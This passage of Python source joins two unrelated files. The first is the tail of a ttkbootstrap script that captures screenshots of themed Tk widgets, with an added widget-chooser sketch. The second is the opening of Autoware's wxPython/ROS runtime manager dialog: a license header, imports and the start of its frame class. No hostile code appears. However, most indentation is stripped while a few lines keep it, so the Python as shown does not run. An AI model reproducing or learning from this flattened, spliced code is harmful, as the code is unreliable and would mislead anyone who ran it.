for c in style.colors:
canvas.create_text((i, 200), text=f'{c}.Vertical.TSeparator', angle=90, font='Helvetica 10')
pb = ttk.Separator(canvas, style=f'{c}.Vertical.TSeparator', orient='vertical')
i += 25
canvas.create_window((i, 215), window=pb, height=300)
i += 50
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
ss = Screenshot(window, f'../images/sizegrip.png')
ttk.Label(text='TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip().pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_primary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'primary'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_secondary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'secondary'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_success(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'success'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_info(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'info'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_warning(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'warning'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_sizegrip_danger(screenshot_on=True, theme='flatly'):
"""
Get screenshot for sizegrip
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('200x75')
color = 'danger'
ss = Screenshot(window, f'../images/sizegrip_{color}.png')
ttk.Label(text=f'{color}.TSizegrip', font='helvetica 10 bold').pack(expand='yes', pady=(10, 0))
ttk.Sizegrip(style=f'{color}.TSizegrip').pack(fill='both', expand='yes')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_primary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'primary'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_secondary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'secondary'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_success(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'success'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_info(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'info'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_warning(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'warning'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_spinbox_danger(screenshot_on=True, theme='flatly'):
"""
Get screenshot for a spinbox
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
color = 'danger'
ss = Screenshot(window, f'../images/spinbox_{color}.png')
f5 = ttk.Frame(window, padding=5)
f5.pack(fill='both', side='left', expand='yes')
# header
ttk.Label(f5, text=f'{color}.TSpinbox', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
ttk.Separator(f5).pack(fill='x', padx=5, pady=5)
# widgets
a = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
a.set(1)
a.pack(side='left', fill='x', padx=5, pady=10)
b = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
b.set(1)
b.pack(side='left', fill='x', padx=5, pady=10)
b.event_generate('<Enter>')
c = ttk.Spinbox(f5, from_=101, to=100, style=f'{color}.TSpinbox')
c.set(1)
c.pack(side='left', fill='x', padx=5, pady=10)
c.focus()
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_primary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'primary'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_secondary(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'secondary'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_success(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'success'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_info(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'info'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_warning(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'warning'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_treeview_danger(screenshot_on=True, theme='flatly'):
"""
Get screenshot for treeview
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('300x125')
color = 'danger'
ss = Screenshot(window, f'../images/treeview_{color}.png')
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
ttk.Label(f1, text=f'{color}.Treeview', font='Helvetica 10 bold', anchor='center').pack(fill='x', pady=5)
# Treeview
tv = ttk.Treeview(f1, height=3, style=f'{color}.Treeview')
tv.pack(fill='x', pady=5)
tv.heading('#0', text='Example heading')
tv.insert('', 'end', 'example1', text='Example 1')
tv.insert('', 'end', 'example2', text='Example 2')
tv.insert('example2', 'end', text='Example 2 Child 1')
tv.insert('example2', 'end', text='Example 2 Child 2')
tv.selection_set('example1')
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_meter(screenshot_on=True, theme='flatly'):
"""
Get screenshot for meter
"""
from ttkbootstrap.widgets import Meter
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/meter.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
# widgets
n = 50
for i, c in enumerate(style.colors):
if i < 3:
m = Meter(f1, amountused=n + (i*10), meterstyle=f'{c}.TMeter', labeltext=f'{c}.TMeter')
m.grid(row=0, column=i, padx=10, pady=10)
else:
m = Meter(f1, amountused=n + (i*10), meterstyle=f'{c}.TMeter', labeltext=f'{c}.TMeter')
m.grid(row=1, column=i-3, padx=10, pady=10)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_floodgauge_horizontal(screenshot_on=True, theme='flatly'):
"""
Get screenshot for horizontal floodgauges
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('800x500')
ss = Screenshot(window, '../images/floodgauge_horizontal.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
for x in [2, 4]:
f1.rowconfigure(x, weight=1)
for y in range(3):
f1.columnconfigure(y, weight=1)
l = ttk.Label(f1, text='Horizontal.TFloodgauge', font='Helvetica 10 bold', anchor='center')
l.grid(row=0, column=0, columnspan=3, pady=10)
# widgets
for i, c in enumerate(style.colors):
s = f'{c}.Horizontal.TFloodgauge'
value = 50 + i * 10
wl = ttk.Label(f1, text=s, anchor='center', padding=(0, 10, 0, 0))
w = widgets.Floodgauge(f1, value=value, text=f'{value}K', style=s, font='helvetica 24 bold')
if i < 3:
wl.grid(row=1, column=i, sticky='sew')
w.grid(row=2, column=i, sticky='news', ipady=10, padx=5, pady=5)
else:
wl.grid(row=3, column=i-3, sticky='sew')
w.grid(row=4, column=i-3, sticky='news', ipady=10, pady=5, padx=5)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_floodgauge_vertical(screenshot_on=True, theme='flatly'):
"""
Get screenshot for vertical floodgauges
"""
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
window.geometry('800x500')
ss = Screenshot(window, '../images/floodgauge_vertical.png')
# headers
f1 = ttk.Frame(window, padding=5)
f1.pack(fill='both', side='left', expand='yes')
for x in [2, 4]:
f1.rowconfigure(x, weight=1)
for y in range(3):
f1.columnconfigure(y, weight=1)
l = ttk.Label(f1, text='Vertical.TFloodgauge', font='Helvetica 10 bold', anchor='center')
l.grid(row=0, column=0, columnspan=3, pady=10)
# widgets
for i, c in enumerate(style.colors):
s = f'{c}.Vertical.TFloodgauge'
value = 50 + i * 10
wl = ttk.Label(f1, text=s, anchor='center', padding=(0, 10, 0, 0))
w = widgets.Floodgauge(f1, value=value, text=f'{value}K', style=s, orient='vertical', font='helvetica 24 bold')
if i < 3:
wl.grid(row=1, column=i, sticky='sew')
w.grid(row=2, column=i, sticky='news', ipady=10, padx=5, pady=5)
else:
wl.grid(row=3, column=i-3, sticky='sew')
w.grid(row=4, column=i-3, sticky='news', ipady=10, pady=5, padx=5)
if screenshot_on:
window.after(1000, lambda: ss.get_bounding_box(None))
window.after(1500, window.quit)
window.mainloop()
def screenshot_date_entry(screenshot_on=True, theme='flatly'):
"""
Get screenshot for date entry
"""
from ttkbootstrap.widgets.calendar import DateEntry
from datetime import datetime
style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/date_entry.png')
ttk.Label(window, text='DateEntry', font='Helvetica 10 bold', anchor='center', padding=(0, 5, 0, 0)).pack(side='top', fill='x')
def entry(color, parent):
# child = ttk.Frame(left_frame)
ttk.Label(parent, text=f'{color}.TCalendar', padding=(0, 15, 0, 5)).pack(fill='x')
DateEntry(parent, startdate=datetime(2021, 5, 14), style=f'{color}.TCalendar').pack()
left_frame = ttk.Frame(window, padding=10)
entry('primary', left_frame)
entry('secondary', left_frame)
entry('success', left_frame)
left_frame.pack(side='left')
right_frame = ttk.Frame(window, padding=10)
entry('info', right_frame)
entry('warning', right_frame)
entry('danger', right_frame)
    right_frame.pack(side='right')
    if screenshot_on:
        window.after(1000, lambda: ss.get_bounding_box(None))
    window.after(1500, window.quit)
    window.mainloop()
def screenshot_date_chooser(screenshot_on=True, theme='flatly'):
"""
    Get screenshot for date chooser
"""
from ttkbootstrap.widgets.calendar import DateChooserPopup
from datetime import datetime
style = Style(theme)
DateChooserPopup(startdate=datetime(2021, 5, 14), style='info.TCalendar')
if __name__ == '__main__':
programs = [
screenshot_button,
screenshot_checkbutton,
screenshot_checkbutton_toolbutton,
screenshot_checkbutton_outline_toolbutton,
screenshot_roundtoggle_toolbutton,
screenshot_squaretoggle_toolbutton,
screenshot_combobox_primary,
screenshot_combobox_secondary,
screenshot_combobox_success,
screenshot_combobox_info,
screenshot_combobox_warning,
screenshot_combobox_danger,
screenshot_date_entry,
screenshot_entry_primary,
screenshot_entry_secondary,
screenshot_entry_success,
screenshot_entry_info,
screenshot_entry_warning,
screenshot_entry_danger,
screenshot_floodgauge_vertical,
screenshot_floodgauge_horizontal,
screenshot_frame,
screenshot_label,
screenshot_labelframe,
screenshot_menubutton,
screenshot_meter,
screenshot_notebook,
screenshot_progressbar_horizontal,
screenshot_progressbar_horizontal_striped,
screenshot_progressbar_vertical,
screenshot_radiobutton,
screenshot_radiobutton_toolbutton,
screenshot_radiobutton_outline_toolbutton,
screenshot_scale_horizontal,
screenshot_scale_vertical,
screenshot_scrollbar_horizontal,
screenshot_scrollbar_vertical,
screenshot_separator_horizontal,
screenshot_separator_vertical,
screenshot_sizegrip,
screenshot_sizegrip_primary,
screenshot_sizegrip_secondary,
screenshot_sizegrip_success,
screenshot_sizegrip_info,
screenshot_sizegrip_warning,
screenshot_sizegrip_danger,
screenshot_spinbox_primary,
screenshot_spinbox_secondary,
screenshot_spinbox_success,
screenshot_spinbox_info,
screenshot_spinbox_warning,
screenshot_spinbox_danger,
screenshot_treeview_primary,
screenshot_treeview_secondary,
screenshot_treeview_success,
screenshot_treeview_info,
screenshot_treeview_warning,
screenshot_treeview_danger,
]
# p_list = []
# for p in programs:
# p_list.append(Process(target=p))
#
# for p in p_list:
# p.start()
# p.join()
screenshot_meter()
    # TODO: add an application window here to select which screenshots to generate.
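    # A minimal, hypothetical sketch for the TODO above (not part of the original
    # script): list the functions in `programs` in a plain Tk chooser and run the
    # selected ones.  The names `show_chooser` and `run_selected` are illustrative.
    show_chooser = False  # flip to True to try the chooser instead of a single call
    if show_chooser:
        import tkinter as tk
        chooser = tk.Tk()
        chooser.title('select screenshots')
        lb = tk.Listbox(chooser, selectmode='multiple', width=45, height=25)
        for p in programs:
            lb.insert('end', p.__name__)
        lb.pack(fill='both', expand=True)
        def run_selected():
            # collect the picked functions, close the chooser, then run them
            picked = [programs[int(i)] for i in lb.curselection()]
            chooser.destroy()
            for fn in picked:
                fn()
        tk.Button(chooser, text='Run selected', command=run_selected).pack(fill='x')
        chooser.mainloop()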
|
runtime_manager_dialog.py
|
#!/usr/bin/env python
"""
Copyright (c) 2015, Nagoya University
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Autoware nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import wx
import wx.lib.buttons
import wx.lib.agw.customtreectrl as CT
import gettext
import os
import re
import sys
import fcntl
import threading
import Queue
import time
import socket
import struct
import shlex
import signal
import subprocess
import psutil
import pty
import yaml
import datetime
import syslog
import rtmgr
import rospy
import std_msgs.msg
from std_msgs.msg import Bool
from decimal import Decimal
from runtime_manager.msg import ConfigRcnn
from runtime_manager.msg import ConfigCarDpm
from runtime_manager.msg import ConfigPedestrianDpm
from runtime_manager.msg import ConfigNdt
from runtime_manager.msg import ConfigNdtMapping
from runtime_manager.msg import ConfigNdtMappingOutput
from runtime_manager.msg import ConfigICP
from runtime_manager.msg import ConfigVoxelGridFilter
from runtime_manager.msg import ConfigRingFilter
from runtime_manager.msg import ConfigDistanceFilter
from runtime_manager.msg import ConfigRandomFilter
from runtime_manager.msg import ConfigWaypointFollower
from runtime_manager.msg import ConfigTwistFilter
from runtime_manager.msg import ConfigVelocitySet
from runtime_manager.msg import ConfigLatticeVelocitySet
from runtime_manager.msg import ConfigCarKf
from runtime_manager.msg import ConfigPedestrianKf
from runtime_manager.msg import ConfigLaneRule
from runtime_manager.msg import ConfigLaneSelect
from runtime_manager.msg import ConfigLaneStop
from runtime_manager.msg import ConfigCarFusion
from runtime_manager.msg import ConfigPedestrianFusion
from tablet_socket.msg import mode_cmd
from tablet_socket.msg import gear_cmd
from tablet_socket.msg import Waypoint
from tablet_socket.msg import route_cmd
from ndt_localizer.msg import ndt_stat
from geometry_msgs.msg import TwistStamped
from geometry_msgs.msg import Vector3
from runtime_manager.msg import accel_cmd
from runtime_manager.msg import steer_cmd
from runtime_manager.msg import brake_cmd
from runtime_manager.msg import indicator_cmd
from runtime_manager.msg import lamp_cmd
from runtime_manager.msg import traffic_light
from runtime_manager.msg import adjust_xy
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
PROC_MANAGER_SOCK="/tmp/autoware_proc_manager"
class MyFrame(rtmgr.MyFrame):
def __init__(self, *args, **kwds):
rtmgr.MyFrame.__init__(self, *args, **kwds)
self.all_procs = []
self.all_cmd_dics = []
self.load_dic = self.load_yaml('param.yaml', def_ret={})
self.config_dic = {}
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.params = []
self.all_tabs = []
self.all_th_infs = []
self.log_que = Queue.Queue()
self.log_que_stdout = Queue.Queue()
self.log_que_stderr = Queue.Queue()
self.log_que_show = Queue.Queue()
#
# ros
#
		rospy.init_node('runtime_manager', anonymous=True)
rospy.Subscriber('to_rtmgr', std_msgs.msg.String, self.RosCb)
self.pub = rospy.Publisher('from_rtmgr', std_msgs.msg.String, queue_size=10)
#
# for Quick Start tab
#
tab = self.tab_qs
self.all_tabs.append(tab)
self.qs_cmd = {}
self.all_cmd_dics.append(self.qs_cmd)
self.qs_dic = self.load_yaml('qs.yaml')
self.add_params(self.qs_dic.get('params', []))
self.setup_buttons(self.qs_dic.get('buttons', {}), self.qs_cmd)
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
for key in self.qs_dic.get('exec_time', {}).get(nm, {}).keys():
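				# each key has the form '<topic>.<msg class name>.<attribute>'; missing parts
				# become None here and fall back to std_msgs.msg.Float32 and 'data' below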
(topic, msg, attr) = ( key.split('.') + [ None, None, None ] )[:3]
msg = globals().get(msg)
msg = msg if msg else std_msgs.msg.Float32
attr = attr if attr else 'data'
rospy.Subscriber(topic, msg, self.exec_time_callback, callback_args=(key, attr))
#
# for Setup tab
#
tab = self.tab_setup
self.all_tabs.append(tab)
setup_cmd = {}
self.all_cmd_dics.append(setup_cmd)
dic = self.load_yaml('setup.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons', {}), setup_cmd)
#
# for Map tab
#
tab = self.tab_map
self.all_tabs.append(tab)
self.map_cmd = {}
self.all_cmd_dics.append(self.map_cmd)
self.map_dic = self.load_yaml('map.yaml')
self.add_params(self.map_dic.get('params', []))
self.setup_buttons(self.map_dic.get('buttons', {}), self.map_cmd)
self.tc_point_cloud = self.obj_to_varpanel_tc(self.button_point_cloud, 'path_pcd')
self.tc_area_list = self.obj_to_varpanel_tc(self.button_area_lists, 'path_area_list')
self.label_point_cloud_bar.Destroy()
self.label_point_cloud_bar = BarLabel(tab, ' Loading... ')
self.label_point_cloud_bar.Enable(False)
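		# hook1G: pop a warning dialog when any of the comma-separated PCD paths
		# returned by the hooked getter points at a file larger than 1 GB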
def hook1G(args):
for f in args.get('func')().split(','):
sz = os.path.getsize(f)
if sz > 1024*1024*1024:
wx.MessageBox("Over 1GB\n\n{}\n({:,})".format(f, sz), caption='Warning')
args = { 'func':self.tc_point_cloud.GetValue }
hook_var = { 'hook':hook1G, 'args':args, 'flags':['every_time'] }
obj = self.button_point_cloud
gdic_v = self.obj_to_gdic(obj, {}).get('path_pcd', {})
gdic_v['hook_var'] = hook_var
#
# for Sensing tab
#
tab = self.tab_sensing
self.all_tabs.append(tab)
self.drv_probe_cmd = {}
self.sensing_cmd = {}
